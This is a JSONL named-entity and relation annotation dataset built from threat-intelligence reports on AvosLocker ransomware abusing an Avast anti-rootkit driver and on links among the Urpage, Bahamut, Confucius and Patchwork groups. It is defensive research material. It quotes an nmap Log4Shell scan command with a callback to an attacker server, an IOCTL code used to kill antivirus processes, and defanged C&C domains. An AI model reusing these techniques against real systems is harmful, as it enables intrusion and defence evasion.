kernel.","entities":[{"id":46957,"label":"FILEPATH","start_offset":60,"end_offset":72},{"id":46958,"label":"FILEPATH","start_offset":92,"end_offset":98},{"id":46959,"label":"FILEPATH","start_offset":129,"end_offset":152},{"id":46960,"label":"SOFTWARE","start_offset":12,"end_offset":37}],"relations":[{"id":279,"from_id":46960,"to_id":46957,"type":"consists-of"}],"Comments":[]} -{"id":1824,"text":"It installs the driver file in preparation for disabling the running antivirus product.","entities":[],"relations":[],"Comments":[]} -{"id":1825,"text":"We noted the unusual use of cmd.exe for execution of the file.","entities":[{"id":5374,"label":"malware","start_offset":28,"end_offset":35}],"relations":[],"Comments":[]} -{"id":1826,"text":" Figure 14.","entities":[],"relations":[],"Comments":[]} -{"id":1827,"text":"Executing the anti-rootkit driver in the system ","entities":[],"relations":[],"Comments":[]} -{"id":1828,"text":"Mimikatz components were also copied to the affected machine via AnyDeskMSI.","entities":[{"id":5378,"label":"tools","start_offset":0,"end_offset":8},{"id":46961,"label":"tools","start_offset":65,"end_offset":75}],"relations":[{"id":277,"from_id":46961,"to_id":5378,"type":"drops"}],"Comments":[]} -{"id":1829,"text":"However, these components were detected and deleted.","entities":[],"relations":[],"Comments":[]} -{"id":1830,"text":" Figure 15.","entities":[],"relations":[],"Comments":[]} -{"id":1831,"text":"Detecting and deleting Mimikatz We observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit Driver).","entities":[{"id":5382,"label":"tools","start_offset":23,"end_offset":31},{"id":5383,"label":"tools","start_offset":53,"end_offset":63},{"id":46962,"label":"SOFTWARE","start_offset":144,"end_offset":169},{"id":46963,"label":"FILEPATH","start_offset":117,"end_offset":129},{"id":46964,"label":"attack-pattern","start_offset":71,"end_offset":102}],"relations":[{"id":278,"from_id":46962,"to_id":46963,"type":"consists-of"}],"Comments":[]} -{"id":1832,"text":"A list of security product processes was supplied and subsequently terminated by the driver. Figure 16.","entities":[],"relations":[],"Comments":[]} -{"id":1833,"text":"Listing","entities":[],"relations":[],"Comments":[]} -{"id":1834,"text":"and","entities":[],"relations":[],"Comments":[]} -{"id":1835,"text":"terminating the security products found running in the compromised system ","entities":[],"relations":[],"Comments":[]} -{"id":1836,"text":"Verification: Manual replication of antivirus disabling routine","entities":[],"relations":[],"Comments":[]} -{"id":1837,"text":"We manually replicated the routine and commands for disabling the defense solutions to further look into the routine.","entities":[],"relations":[],"Comments":[]} -{"id":1838,"text":"Figure 17 shows the list of processes that the routine searches on infection : EndpointBasecamp.exe Trend Micro Endpoint Basecamp ResponseService.exe PccNTMon.exe SupportConnector.exe AOTAgent.exe CETASvc.exe CETASvc iVPAgent.exe tmwscsvc.exe TMResponse AOTAgentSvc TMBMServer iVPAgent Trend Micro Web Service Communicator Tmccsf Tmlisten Ntrtscan TmWSCSvc Figure 17.","entities":[{"id":46965,"label":"FILEPATH","start_offset":80,"end_offset":100},{"id":46966,"label":"FILEPATH","start_offset":131,"end_offset":150},{"id":46967,"label":"FILEPATH","start_offset":151,"end_offset":163},{"id":46968,"label":"FILEPATH","start_offset":164,"end_offset":184},{"id":46972,"label":"FILEPATH","start_offset":218,"end_offset":230},{"id":46969,"label":"FILEPATH","start_offset":185,"end_offset":197},{"id":46971,"label":"FILEPATH","start_offset":198,"end_offset":209},{"id":46973,"label":"FILEPATH","start_offset":231,"end_offset":243},{"id":46974,"label":"SOFTWARE","start_offset":101,"end_offset":130},{"id":46975,"label":"SOFTWARE","start_offset":287,"end_offset":323}],"relations":[],"Comments":[]} -{"id":1839,"text":"Searching for processes We found that aswArPot.sys, registered as aswSP_ArPot2 as a service, is used as the handle for the following DeviceIoControl call.","entities":[{"id":45144,"label":"FILEPATH","start_offset":42,"end_offset":54}],"relations":[],"Comments":[]} -{"id":1840,"text":" Figure 18.","entities":[],"relations":[],"Comments":[]} -{"id":1841,"text":"Driver file preparing to disable an antivirus product The DeviceIoControl function is used to execute parts of the driver.","entities":[],"relations":[],"Comments":[]} -{"id":1842,"text":"In this case, the DeviceIoControl is inside a loop that iterates through the list of processes mentioned above.","entities":[],"relations":[],"Comments":[]} -{"id":1843,"text":"Additionally, we can see that 0x9988C094 is passed to DeviceIoControl as an argument simultaneous to the ID of the current process in the iteration.","entities":[],"relations":[],"Comments":[]} -{"id":1844,"text":" Figure 19.","entities":[],"relations":[],"Comments":[]} -{"id":1845,"text":"DeviceIoControl as an argument with the current process ID ","entities":[],"relations":[],"Comments":[]} -{"id":1846,"text":"Inside aswArPot.sys, we saw 0x9988C094 in a switch case with a function sub_14001DC80 case.","entities":[{"id":46976,"label":"FILEPATH","start_offset":7,"end_offset":19}],"relations":[],"Comments":[]} -{"id":1847,"text":"Inside function sub_14001DC80, we can see that that function has the capability to terminate a given process.","entities":[],"relations":[],"Comments":[]} -{"id":1848,"text":" Figure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter value terminating a process (below).","entities":[],"relations":[],"Comments":[]} -{"id":1849,"text":" Other executions and lateral movement","entities":[{"id":46977,"label":"attack-pattern","start_offset":25,"end_offset":41}],"relations":[],"Comments":[]} -{"id":1850,"text":"After disabling the security products, the actors behind AvosLocker again tried to transfer other tools, namely Mimikatz and Impacket.","entities":[{"id":46979,"label":"tools","start_offset":112,"end_offset":120},{"id":46978,"label":"malware","start_offset":57,"end_offset":67},{"id":46980,"label":"tools","start_offset":125,"end_offset":133}],"relations":[{"id":280,"from_id":46978,"to_id":46979,"type":"downloads"},{"id":281,"from_id":46978,"to_id":46980,"type":"downloads"}],"Comments":[]} -{"id":1851,"text":" Figure 21. Execution of Mimikatz (above) and Impacket via C:\\temp\\wmiexec.exe (below)","entities":[{"id":45148,"label":"tools","start_offset":50,"end_offset":58},{"id":45146,"label":"tools","start_offset":29,"end_offset":37},{"id":45147,"label":"FILEPATH","start_offset":63,"end_offset":82}],"relations":[],"Comments":[]} -{"id":1852,"text":" We also observed the execution of a password recovery tool XenArmor with C:\\temp\\pass\\start.exe.","entities":[{"id":46982,"label":"tools","start_offset":63,"end_offset":71},{"id":46981,"label":"FILEPATH","start_offset":77,"end_offset":99}],"relations":[{"id":282,"from_id":46982,"to_id":46981,"type":"consists-of"}],"Comments":[]} -{"id":1853,"text":" Figure 22. XenArmor password recovery tool execution ","entities":[{"id":46983,"label":"tools","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} -{"id":1854,"text":"We observed the attackers using an NMAP script to check for Log4shell, the Apache Log4j remote code execution (RCE, with ID CVE-2021-44228) vulnerability across the network.","entities":[{"id":45150,"label":"vulnerability","start_offset":60,"end_offset":69},{"id":45149,"label":"tools","start_offset":35,"end_offset":39},{"id":45152,"label":"vulnerability","start_offset":75,"end_offset":109},{"id":45153,"label":"vulnerability","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} -{"id":1855,"text":"They used the command nmap --script log4shell.nse --script-args log4shell.waf-bypass=true --script-args log4shell.callback-server=xx.xx.xx.xx:1389 -p 80,443 xx.xx.xx.xx\/xx, and set the callback server to the attacker group C&C server. Figure 23.","entities":[{"id":5436,"label":"tools","start_offset":22,"end_offset":26}],"relations":[],"Comments":[]} -{"id":1856,"text":"Checking for log4shell We also observed more system network configuration discovery techniques being run, possibly for lateral movement as it tried looking for other available endpoints.","entities":[{"id":5440,"label":"attack-pattern","start_offset":49,"end_offset":87},{"id":46984,"label":"attack-pattern","start_offset":123,"end_offset":139}],"relations":[],"Comments":[]} -{"id":1857,"text":" Figure 24. Running more system network configuration discovery scans","entities":[{"id":5442,"label":"attack-pattern","start_offset":29,"end_offset":67}],"relations":[],"Comments":[]} -{"id":1858,"text":" Deploying across the network We saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network.","entities":[{"id":46986,"label":"attack-pattern","start_offset":83,"end_offset":113},{"id":46985,"label":"tools","start_offset":65,"end_offset":68}],"relations":[{"id":283,"from_id":46986,"to_id":46985,"type":"uses"}],"Comments":[]} -{"id":1859,"text":" Figure 25. Deploying malicious batch scripts to other endpoints The deployed batch script has the following commands: Disable Windows Update and Microsoft Defender Figure 26. Disable Microsoft defense services Prevents safeboot execution of security products Figure 27. Prevent security products’ execution Create new administrator account Figure 28. Create new account Add the AutoStart mechanism for the AvosLocker executable (update.exe) Figure 29. Add Autostart for ransomware executable Disables legal notice caption Figure 30. Disable legal notice Set safeboot with networking and disables Windows Error Recovery and reboot Figure 31. Setting and disabling network and specific Windows functions Conclusion","entities":[{"id":46990,"label":"malware","start_offset":449,"end_offset":459},{"id":46991,"label":"FILEPATH","start_offset":472,"end_offset":482},{"id":46987,"label":"tools","start_offset":136,"end_offset":150},{"id":46988,"label":"tools","start_offset":155,"end_offset":173}],"relations":[],"Comments":[]} -{"id":1860,"text":"While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it.","entities":[{"id":45154,"label":"malware","start_offset":6,"end_offset":16},{"id":45155,"label":"tools","start_offset":54,"end_offset":61},{"id":45156,"label":"attack-pattern","start_offset":66,"end_offset":82}],"relations":[{"id":77,"from_id":45154,"to_id":45155,"type":"uses"},{"id":284,"from_id":45156,"to_id":45155,"type":"uses"},{"id":285,"from_id":45154,"to_id":45156,"type":"uses"}],"Comments":[]} -{"id":1861,"text":"We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones.","entities":[],"relations":[],"Comments":[]} -{"id":1862,"text":"In addition, aside from its availability, the decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege).","entities":[],"relations":[],"Comments":[]} -{"id":1863,"text":"This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice.","entities":[],"relations":[],"Comments":[]} -{"id":1864,"text":"Other modern ransomware, such as Mespinoza\/Pysa, modify the registries of infected systems during their respective routines to inform their victims that they have been compromised.","entities":[{"id":5472,"label":"threat-actor","start_offset":43,"end_offset":47},{"id":5471,"label":"threat-actor","start_offset":33,"end_offset":42}],"relations":[],"Comments":[]} -{"id":1865,"text":"Similar to previously documented malware and ransomware groups, AvosLocker takes advantage of the different vulnerabilities that have yet to be patched to get into organizations’ networks.","entities":[{"id":5474,"label":"malware","start_offset":64,"end_offset":74}],"relations":[],"Comments":[]} -{"id":1866,"text":"Once inside, the continuing trend of abusing legitimate tools and functions to mask malicious activities and actors’ presence","entities":[],"relations":[],"Comments":[]} -{"id":1867,"text":"grows in sophistication.","entities":[],"relations":[],"Comments":[]} -{"id":1868,"text":"In this case, the attackers were able to study and use Avast’s driver as part of their arsenal to disable other vendors’ security products.","entities":[{"id":46992,"label":"identity","start_offset":55,"end_offset":61}],"relations":[],"Comments":[]} -{"id":1869,"text":"However, and specific to this instance, the attempt to kill an antivirus product such as this variant’s TaskKill can also be foiled.","entities":[],"relations":[],"Comments":[]} -{"id":1870,"text":"In this example using Trend Micro Vision One, the attempt was unsuccessful likely due to the product’s self-protection feature, which allowed the sensors to continue sending data and block the noted routine.","entities":[{"id":46993,"label":"SOFTWARE","start_offset":22,"end_offset":44}],"relations":[],"Comments":[]} -{"id":1871,"text":"The visibility enabled by the platform allowed us as researchers to capture the extent of this ransomware’s attack chain and replicate the driver file being abused to verify its function during compromise.","entities":[],"relations":[],"Comments":[]} -{"id":1872,"text":"Avast responded to our notification with this statement: \"We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021.","entities":[{"id":45157,"label":"FILEPATH","start_offset":123,"end_offset":135},{"id":45158,"label":"SOFTWARE","start_offset":159,"end_offset":169},{"id":45159,"label":"TIME","start_offset":182,"end_offset":191},{"id":45160,"label":"identity","start_offset":0,"end_offset":5}],"relations":[{"id":286,"from_id":45158,"to_id":45157,"type":"consists-of"}],"Comments":[]} -{"id":1873,"text":"We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so the old version of the Avast driver can't be loaded to memory.","entities":[{"id":46995,"label":"SOFTWARE","start_offset":71,"end_offset":107},{"id":46994,"label":"identity","start_offset":28,"end_offset":37},{"id":46996,"label":"SOFTWARE","start_offset":135,"end_offset":147}],"relations":[],"Comments":[]} -{"id":1874,"text":"The below example shows that the blocking works (output from the \"sc start\" command):","entities":[],"relations":[],"Comments":[]} -{"id":1875,"text":" (SC) StartService FAILED 1275: This driver has been blocked from loading","entities":[],"relations":[],"Comments":[]} -{"id":1876,"text":"The update from Microsoft for the Windows operating system was published in February as an optional update, and in Microsoft's security release in April, so fully updated machines running Windows 10 and 11 are not vulnerable to this kind of attack.","entities":[{"id":46997,"label":"SOFTWARE","start_offset":34,"end_offset":58},{"id":46998,"label":"TIME","start_offset":76,"end_offset":84},{"id":47000,"label":"identity","start_offset":115,"end_offset":124},{"id":47001,"label":"TIME","start_offset":147,"end_offset":152},{"id":46999,"label":"identity","start_offset":16,"end_offset":25},{"id":47002,"label":"SOFTWARE","start_offset":188,"end_offset":205}],"relations":[],"Comments":[]} -{"id":1877,"text":"All consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so our users are protected from this attack vector.","entities":[{"id":47003,"label":"SOFTWARE","start_offset":48,"end_offset":53},{"id":47004,"label":"SOFTWARE","start_offset":58,"end_offset":61},{"id":47005,"label":"malware","start_offset":84,"end_offset":94}],"relations":[],"Comments":[]} -{"id":1878,"text":"For users of third-party antivirus software, to stay protected against this vulnerability, we recommend users to update their Windows operating system with the latest security updates, and to use a fully updated antivirus program.\"","entities":[{"id":47006,"label":"SOFTWARE","start_offset":126,"end_offset":143}],"relations":[],"Comments":[]} -{"id":1879,"text":"Indicators of Compromise (IOCs) File SHA256 Detection Malicious batch file component a5ad3355f55e1a15baefea83ce81d038531af516f47716018b1dedf04f081f15","entities":[{"id":5521,"label":"SHA1","start_offset":91,"end_offset":155}],"relations":[],"Comments":[]} -{"id":1880,"text":"Trojan","entities":[],"relations":[],"Comments":[]} -{"id":1881,"text":"BAT.KILLAV.YACAA","entities":[],"relations":[],"Comments":[]} -{"id":1882,"text":"AvosLocker executable 05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5 Ransom.Win32.AVOSLOCKER.SMYXBLNT Mimikatz executable (x32 and x64) 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 HackTool.Win64.MIMIKATZ.ZTJA e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98 HackTool.Win32.Mimikatz.CNFW Log4shell Nmap NSE script ddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96 Backdoor.Win32.CVE202144228.YACAH Impacket tool 14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8 HackTool.Win32.Impacket.AA","entities":[{"id":5525,"label":"tools","start_offset":120,"end_offset":128},{"id":5529,"label":"tools","start_offset":352,"end_offset":356},{"id":5523,"label":"SHA2","start_offset":22,"end_offset":86},{"id":5530,"label":"SHA2","start_offset":368,"end_offset":432},{"id":5522,"label":"malware","start_offset":0,"end_offset":10},{"id":5527,"label":"SHA2","start_offset":154,"end_offset":218},{"id":5528,"label":"SHA2","start_offset":248,"end_offset":312},{"id":5533,"label":"SHA2","start_offset":481,"end_offset":545},{"id":5531,"label":"tools","start_offset":467,"end_offset":475},{"id":47007,"label":"tools","start_offset":546,"end_offset":572},{"id":47009,"label":"tools","start_offset":219,"end_offset":247},{"id":47011,"label":"vulnerability","start_offset":342,"end_offset":351},{"id":47012,"label":"malware","start_offset":87,"end_offset":119},{"id":47008,"label":"tools","start_offset":313,"end_offset":341},{"id":47010,"label":"tools","start_offset":433,"end_offset":466}],"relations":[{"id":288,"from_id":47012,"to_id":5522,"type":"duplicate-of"},{"id":287,"from_id":5522,"to_id":5523,"type":"consists-of"}],"Comments":[]} -{"id":1883,"text":" Tags Malware | Exploits & Vulnerabilities | Cyber Threats | APT & Targeted Attacks | Compliance & Risks | Endpoints | Ransomware | Network | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} -{"id":1884,"text":"In the process of monitoring changes in the threat landscape, we get a clearer insight into the way threat actors work behind the schemes.","entities":[],"relations":[],"Comments":[]} -{"id":1885,"text":"In this case we dig deeper into the possible connection between cyberattacks by focusing on the similarities an unnamed threat actor shares with Confucius, Patchwork, and another threat actor called Bahamut.","entities":[{"id":47014,"label":"threat-actor","start_offset":156,"end_offset":165},{"id":47013,"label":"threat-actor","start_offset":145,"end_offset":154},{"id":47015,"label":"threat-actor","start_offset":199,"end_offset":206}],"relations":[],"Comments":[]} -{"id":1886,"text":"For the sake of this report, we will call this unnamed threat actor “Urpage.”","entities":[{"id":47016,"label":"threat-actor","start_offset":69,"end_offset":75}],"relations":[],"Comments":[]} -{"id":1887,"text":"What sets Urpage attacks apart is its targeting of InPage, a word processor for Urdu and Arabic languages.","entities":[{"id":45163,"label":"SOFTWARE","start_offset":51,"end_offset":57},{"id":45162,"label":"threat-actor","start_offset":10,"end_offset":16}],"relations":[{"id":78,"from_id":45162,"to_id":45163,"type":"targets"}],"Comments":[]} -{"id":1888,"text":"However, its Delphi backdoor component, which it has in common with Confucius and Patchwork, and its apparent use of Bahamut-like malware, is what makes it more intriguing as it connects Urpage to these other known threats.","entities":[{"id":47017,"label":"threat-actor","start_offset":68,"end_offset":77},{"id":47019,"label":"threat-actor","start_offset":82,"end_offset":91},{"id":47020,"label":"threat-actor","start_offset":117,"end_offset":124},{"id":47021,"label":"threat-actor","start_offset":187,"end_offset":193}],"relations":[],"Comments":[]} -{"id":1889,"text":"In our previous entry, we already covered the Delphi component in the context of the Confucius and Patchwork connection.","entities":[{"id":47022,"label":"threat-actor","start_offset":85,"end_offset":94},{"id":47023,"label":"threat-actor","start_offset":99,"end_offset":108}],"relations":[],"Comments":[]} -{"id":1890,"text":"We mentioned Urpage as a third unnamed threat actor connected to the two.","entities":[{"id":45164,"label":"threat-actor","start_offset":13,"end_offset":19}],"relations":[],"Comments":[]} -{"id":1891,"text":"This time, we look into Urpage to gain a deeper insight into the way several threat actors' actions intersect.","entities":[{"id":47024,"label":"threat-actor","start_offset":24,"end_offset":30}],"relations":[],"Comments":[]} -{"id":1892,"text":"The Bahamut Link Fake websites","entities":[{"id":5568,"label":"threat-actor","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} -{"id":1893,"text":"The link between Bahamut and Urpage can be best discussed by way of the multiple malicious Android samples that matched Bahamut's code and had C&C belonging to the Urpage infrastructure.","entities":[{"id":45170,"label":"Infrastucture","start_offset":143,"end_offset":146},{"id":45167,"label":"threat-actor","start_offset":120,"end_offset":128},{"id":5570,"label":"threat-actor","start_offset":17,"end_offset":24},{"id":5572,"label":"threat-actor","start_offset":29,"end_offset":35},{"id":5578,"label":"threat-actor","start_offset":164,"end_offset":170},{"id":47025,"label":"SOFTWARE","start_offset":91,"end_offset":106}],"relations":[{"id":289,"from_id":5570,"to_id":5572,"type":"related-to"}],"Comments":[]} -{"id":1894,"text":"Some of these C&C websites also act as phishing sites that lure users into downloading these very applications.","entities":[{"id":47026,"label":"attack-pattern","start_offset":39,"end_offset":47}],"relations":[],"Comments":[]} -{"id":1895,"text":"The threat actor sets up these fake websites describing the application and linking to the Google Play Store to download it, like in the case of the malicious website, pikrpro[.]eu, seen below Another sample website involved the use of a closely copied version of an existing website, with slight changes in the logo and options above the page.","entities":[{"id":47027,"label":"SOFTWARE","start_offset":91,"end_offset":108},{"id":47028,"label":"DOMAIN","start_offset":168,"end_offset":180}],"relations":[],"Comments":[]} -{"id":1896,"text":"The download links were also replaced to download the malicious Android application instead.","entities":[{"id":45171,"label":"SOFTWARE","start_offset":64,"end_offset":71}],"relations":[],"Comments":[]} -{"id":1897,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":1898,"text":"Original (top) and modified (bottom) website","entities":[],"relations":[],"Comments":[]} -{"id":1899,"text":"Upon writing this entry, we’ve coordinated with Google to ensure that the malicious applications these C&C sites advertise are no longer available for download on the Google Play Store.","entities":[{"id":45172,"label":"identity","start_offset":48,"end_offset":54},{"id":45173,"label":"SOFTWARE","start_offset":167,"end_offset":184}],"relations":[],"Comments":[]} -{"id":1900,"text":"It is important to note however, that not all C&C websites for Urpage advertise malicious applications.","entities":[{"id":5595,"label":"threat-actor","start_offset":63,"end_offset":69}],"relations":[],"Comments":[]} -{"id":1901,"text":" Some simply contain a random template with empty categories, likely as a ploy to hide its malicious activities.","entities":[],"relations":[],"Comments":[]} -{"id":1902,"text":"Android targeting","entities":[{"id":45174,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":1903,"text":"As with Bahamut applications, once downloaded and executed, it showed multiple malicious features that deal with stealing information.","entities":[{"id":47030,"label":"attack-pattern","start_offset":113,"end_offset":133},{"id":47029,"label":"threat-actor","start_offset":8,"end_offset":15}],"relations":[{"id":290,"from_id":47029,"to_id":47030,"type":"uses"}],"Comments":[]} -{"id":1904,"text":"Some of these features are listed below.","entities":[],"relations":[],"Comments":[]} -{"id":1905,"text":" Retrieves basic information like network information and MAC address from an infected phone SMS stealing Contacts stealing Audio recording GPS location retrieval Steals files with the specific extensions, although not all samples target these extensions.","entities":[],"relations":[],"Comments":[]} -{"id":1906,"text":" File type File extensions Document files .txt, .csv, .doc, .docx, .xls, .xlsx, .pdf WhatsApp databases .db.crypt5 to .db.crypt12 Geolocation related files .kml, .kmz, .gmx, .aqm Audio files .mp3, .opus Videos .mp4, .amr, .wmv, .3gp, Pictures .jpeg, .jpg ","entities":[{"id":47031,"label":"SOFTWARE","start_offset":86,"end_offset":94}],"relations":[],"Comments":[]} -{"id":1907,"text":"Of note is one specific application that had a different purpose from the others.","entities":[],"relations":[],"Comments":[]} -{"id":1908,"text":"This application has the same encryption routine as other Urpage applications.","entities":[{"id":45175,"label":"threat-actor","start_offset":58,"end_offset":64}],"relations":[],"Comments":[]} -{"id":1909,"text":"Instead of stealing documents or images, it works on top of a modified version of the legitimate Threema, an end-to-end encrypted messaging application, to steal screenshots of messages.","entities":[{"id":47032,"label":"SOFTWARE","start_offset":97,"end_offset":104}],"relations":[],"Comments":[]} -{"id":1910,"text":"This application has the same icon and label as the legitimate Threema.","entities":[{"id":47033,"label":"SOFTWARE","start_offset":63,"end_offset":70}],"relations":[],"Comments":[]} -{"id":1911,"text":"Once launched, it drops a modified APK version of Threema and prompts the user to install the application.","entities":[{"id":45176,"label":"SOFTWARE","start_offset":50,"end_offset":57}],"relations":[],"Comments":[]} -{"id":1912,"text":"The malicious application then hides its icon on the device but still runs in the background, while the modified Threema works like normal.","entities":[{"id":47034,"label":"SOFTWARE","start_offset":113,"end_offset":120}],"relations":[],"Comments":[]} -{"id":1913,"text":"Unknown to the user, the code in the modified Threema allows it to take screenshots of itself every 10 seconds.","entities":[{"id":5617,"label":"TIME","start_offset":94,"end_offset":110},{"id":47035,"label":"SOFTWARE","start_offset":46,"end_offset":53}],"relations":[],"Comments":[]} -{"id":1914,"text":"These images are stored in the location\/sdcard\/Android\/data\/ch.threema.app\/DataData directory, while the “dropper” or the malicious application working in the background uploads the images to the C&C for the threat actor to access.","entities":[{"id":45177,"label":"FILEPATH","start_offset":39,"end_offset":83},{"id":45178,"label":"Infrastucture","start_offset":196,"end_offset":199}],"relations":[],"Comments":[]} -{"id":1915,"text":"Figure 2. Comparison of legitimate Threema code (left) to the modified version (right) with the inserted code","entities":[{"id":47036,"label":"SOFTWARE","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} -{"id":1916,"text":"Other activities","entities":[],"relations":[],"Comments":[]} -{"id":1917,"text":"Aside from acting as a C&C and distributing Bahamut-like malware, some of these websites also serve as the host for other malicious documents.","entities":[{"id":45179,"label":"threat-actor","start_offset":44,"end_offset":51}],"relations":[],"Comments":[]} -{"id":1918,"text":"These other activities further establish the link of Urpage — and consequently Bahamut — to other threat actors.","entities":[{"id":5624,"label":"threat-actor","start_offset":53,"end_offset":59},{"id":47037,"label":"threat-actor","start_offset":79,"end_offset":86}],"relations":[],"Comments":[]} -{"id":1919,"text":"Take, for example, the previously mentioned pikrpro[.]eu.","entities":[{"id":47038,"label":"DOMAIN","start_offset":44,"end_offset":56}],"relations":[],"Comments":[]} -{"id":1920,"text":"This C&C website also acts as host not only for the malicious Android application but also for two other malicious documents listed here.","entities":[{"id":45180,"label":"SOFTWARE","start_offset":62,"end_offset":69}],"relations":[],"Comments":[]} -{"id":1921,"text":" A malicious RTF file that exploits the CVE-2017-8750 and drops a malicious VB backdoor with C&C appswonder[.]info A malicious InPage file that exploits CVE-2017-12824 and drops two files, one non-malicious, and one malicious VB backdoor with C&C referfile[.]com Talos recently reported both C&C domain names with one type of campaign that targets iOS and involves MDM, and another type using VB and Delphi backdoors.","entities":[{"id":47039,"label":"vulnerability","start_offset":40,"end_offset":53},{"id":47042,"label":"DOMAIN","start_offset":247,"end_offset":262},{"id":47043,"label":"identity","start_offset":264,"end_offset":269},{"id":47044,"label":"SOFTWARE","start_offset":349,"end_offset":352},{"id":47045,"label":"malware","start_offset":3,"end_offset":16},{"id":47040,"label":"vulnerability","start_offset":153,"end_offset":167},{"id":47041,"label":"DOMAIN","start_offset":97,"end_offset":114}],"relations":[{"id":291,"from_id":47045,"to_id":47039,"type":"exploits"},{"id":292,"from_id":47045,"to_id":47041,"type":"communicates-with"}],"Comments":[]} -{"id":1922,"text":"This leads us back to the Confucius and Patchwork link.","entities":[{"id":5646,"label":"threat-actor","start_offset":40,"end_offset":49},{"id":47046,"label":"threat-actor","start_offset":26,"end_offset":35}],"relations":[],"Comments":[]} -{"id":1923,"text":"The Confucius Link","entities":[{"id":47047,"label":"threat-actor","start_offset":4,"end_offset":13}],"relations":[],"Comments":[]} -{"id":1924,"text":"In our previous entry, we already discussed how Confucius used the same Delphi file stealer as Urpage.","entities":[{"id":47048,"label":"threat-actor","start_offset":48,"end_offset":57},{"id":47049,"label":"threat-actor","start_offset":95,"end_offset":101}],"relations":[],"Comments":[]} -{"id":1925,"text":"Digging into Urpage, we found another link—two malicious RTF files that exploit different vulnerabilities but download a similar script (detected as TROJ_POWLOAD.GAA) containing two base64-encoded URLs.","entities":[{"id":47050,"label":"threat-actor","start_offset":13,"end_offset":19}],"relations":[],"Comments":[]} -{"id":1926,"text":"One of the URLs is for the decoy document, while the other one is for the payload.","entities":[],"relations":[],"Comments":[]} -{"id":1927,"text":"One of the RTF files was found in a server related to Confucius (f1a54dca2fdfe59ec3f537148460364fb5d046c9b4e7db5fc819a9732ae0e063, detected as TROJ_CVE201711882.AG), while the other one (434d34c0502910c562f5c6840694737a2c82a8c44004fa58c7c457b08aac17bd,detected as Mal_CVE20170199-2) downloaded a VB Backdoor that pings back to twitck[.]com, a domain name belonging to Urpage.","entities":[{"id":5662,"label":"SHA2","start_offset":187,"end_offset":251},{"id":5659,"label":"threat-actor","start_offset":54,"end_offset":63},{"id":5660,"label":"SHA2","start_offset":65,"end_offset":129},{"id":47051,"label":"malware","start_offset":143,"end_offset":163},{"id":47052,"label":"malware","start_offset":264,"end_offset":281},{"id":47053,"label":"DOMAIN","start_offset":327,"end_offset":339},{"id":47054,"label":"threat-actor","start_offset":368,"end_offset":374}],"relations":[{"id":293,"from_id":5660,"to_id":5659,"type":"authored-by"},{"id":294,"from_id":47051,"to_id":5660,"type":"related-to"},{"id":295,"from_id":47051,"to_id":5659,"type":"authored-by"},{"id":296,"from_id":5662,"to_id":5659,"type":"authored-by"},{"id":297,"from_id":47052,"to_id":5659,"type":"authored-by"},{"id":298,"from_id":47052,"to_id":47053,"type":"beacons-to"},{"id":299,"from_id":47054,"to_id":47053,"type":"controls"}],"Comments":[]} -{"id":1928,"text":"The Patchwork Link Patchwork also uses the Delphi file stealer as a similarity with Urpage, which suggests the three groups are somehow related.","entities":[{"id":5664,"label":"threat-actor","start_offset":4,"end_offset":13},{"id":5665,"label":"threat-actor","start_offset":19,"end_offset":28},{"id":47055,"label":"threat-actor","start_offset":84,"end_offset":90}],"relations":[],"Comments":[]} -{"id":1929,"text":"But this link is further fortified by the Android applications we found whose code is like that of Bahamut, with the C&C matching the usual name registration pattern of Patchwork’s group, as well as an infrastructure close to an old Patchwork domain.","entities":[{"id":45181,"label":"SOFTWARE","start_offset":42,"end_offset":49},{"id":45183,"label":"threat-actor","start_offset":169,"end_offset":178},{"id":45184,"label":"threat-actor","start_offset":233,"end_offset":242},{"id":45182,"label":"malware","start_offset":99,"end_offset":106}],"relations":[{"id":80,"from_id":45182,"to_id":45183,"type":"attributed-to"}],"Comments":[]} -{"id":1931,"text":"Patchwork has also recently employed Android malware in its attacks, with its use of a customized version of AndroRAT.","entities":[{"id":47056,"label":"malware","start_offset":109,"end_offset":117},{"id":47058,"label":"SOFTWARE","start_offset":37,"end_offset":44},{"id":47057,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":1932,"text":"Summary","entities":[],"relations":[],"Comments":[]} -{"id":1933,"text":"The many similarities and connections show that threat actors do not work in isolation, and that attacks do not necessarily appear from out of nowhere.","entities":[],"relations":[],"Comments":[]} -{"id":1934,"text":"This may even suggest that a single development team may be behind this attack — maybe a single paid group that has sold its tools and services to other groups with different goals and targets.","entities":[],"relations":[],"Comments":[]} -{"id":1935,"text":"We’ve summarized all the mentioned findings in the table below.","entities":[],"relations":[],"Comments":[]} -{"id":1936,"text":" Urpage Bahamut Confucius Patchwork \"BioData\" Delphi backdoor and file stealer X X X VB backdoor X Android \"Bahamut-like\" malware X X X Custom Android malware X AndroRAT Android malware X InPage malicious documents X X simply obfuscated HTA downloaders X X IOS malware X Confucius malware X remote-access-c3 backdoor X Sneepy\/Byebye shell malware X Python cloud filestealers X AllaKore RAT X Badnews malware X QuasarRAT X NDiskMonitor malware X 